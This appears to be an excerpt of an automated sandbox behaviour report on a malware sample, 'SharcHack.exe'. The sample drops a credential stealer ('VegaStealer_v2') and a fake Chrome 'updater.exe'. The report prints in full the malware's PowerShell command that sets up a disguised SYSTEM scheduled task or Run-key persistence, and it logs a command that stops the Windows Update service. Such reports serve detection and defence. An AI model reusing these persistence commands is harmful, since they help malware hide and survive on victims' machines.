                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Users\user\Desktop\SharcHack.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpWindow found: window name: TSelectLanguageFormJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Accept
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Accept
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Accept
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Windows\System32\conhost.exeDirectory created: C:\Program Files\Google\Libs
                                  Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
                                  Source: SharcHack.exeStatic file information: File size 41879040 > 1048576
                                  Source: SharcHack.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x27ee400
                                  Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: v2.exe, v2.exe, 00000007.00000002.2187180994.0000000005992000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.dr
                                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: v2.exe, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: :.pdbSH source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\Github\zbShield-Utils-CPP\zbShieldUtils\bin\Release\zbShieldUtils.pdb source: CheatEngine75.tmp, 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.Linq.2010\Release\System.Data.SQLite.Linq.pdb source: VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr
                                  Source: Binary string: .pdbSHA2562$ source: VegaStealer_v2.exe, 00000005.00000003.2037815646.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: .pdb` source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.pdb source: v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.EF6.2010\Release\System.Data.SQLite.EF6.pdb source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: Crypto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: rop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdb source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2010\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdb source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework.SqlServer/Release/net40/EntityFramework.SqlServer.pdbSHA256$ source: VegaStealer_v2.exe, 00000005.00000003.2037290562.000000000307C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: pto.pdb source: VegaStealer_v2.exe, 00000005.00000003.2029473867.0000000003326000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: .pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: BouncyCastle.Crypto.pdb source: v2.exe, v2.exe, 00000007.00000002.2192854824.0000000007CA2000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: /_/artifacts/obj/EntityFramework/Release/net40/EntityFramework.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2034886506.0000000003585000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2010\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: :.pdb source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp

                                  Data Obfuscation

                                  barindex
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: Newtonsoft.Json.dll.5.drStatic PE information: 0xA7D0BC1F [Fri Mar 21 12:18:39 2059 UTC]
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBDF76D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_6BBDF76D
                                  Source: 3.exe.0.drStatic PE information: section name: .xdata
                                  Source: CheatEngine75.exe.0.drStatic PE information: section name: .didata
                                  Source: updater.exe.2.drStatic PE information: section name: .xdata
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69B299156 push rbx; retf 2_2_00007FF69B299157
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeCode function: 2_2_00007FF69B299177 push 4B4BA300h; ret 2_2_00007FF69B299183
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_6BBD7B85 push ecx; ret 7_2_6BBD7B98
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_02CC8088 pushad ; iretd 7_2_02CC8169
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_02CC816A push esp; iretd 7_2_02CC8171
                                  Source: C:\Users\user\AppData\Local\Temp\v2.exeCode function: 7_2_02CCCFA0 pushad ; ret 7_2_02CCCFB6
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpCode function: 8_2_6B600C2D push ecx; ret 8_2_6B600C40

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\v2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-L3QGH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeFile created: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\Desktop\SharcHack.exeFile created: C:\Users\user\AppData\Local\Temp\3.exeJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\SQLite.Interop.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\3.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\SharcHack.exeFile created: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2 (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dllJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\cfoutowi.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exeFile created: C:\Users\user\AppData\Local\Temp\EntityFramework.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\SharcHack.exeFile created: C:\Users\user\AppData\Local\Temp\CheatEngine75.exeJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\cfoutowi.tmpJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\CFOUTOWI.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\CFOUTOWI.TMP
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmpRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                  Source: C:\Users\user\Desktop\SharcHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
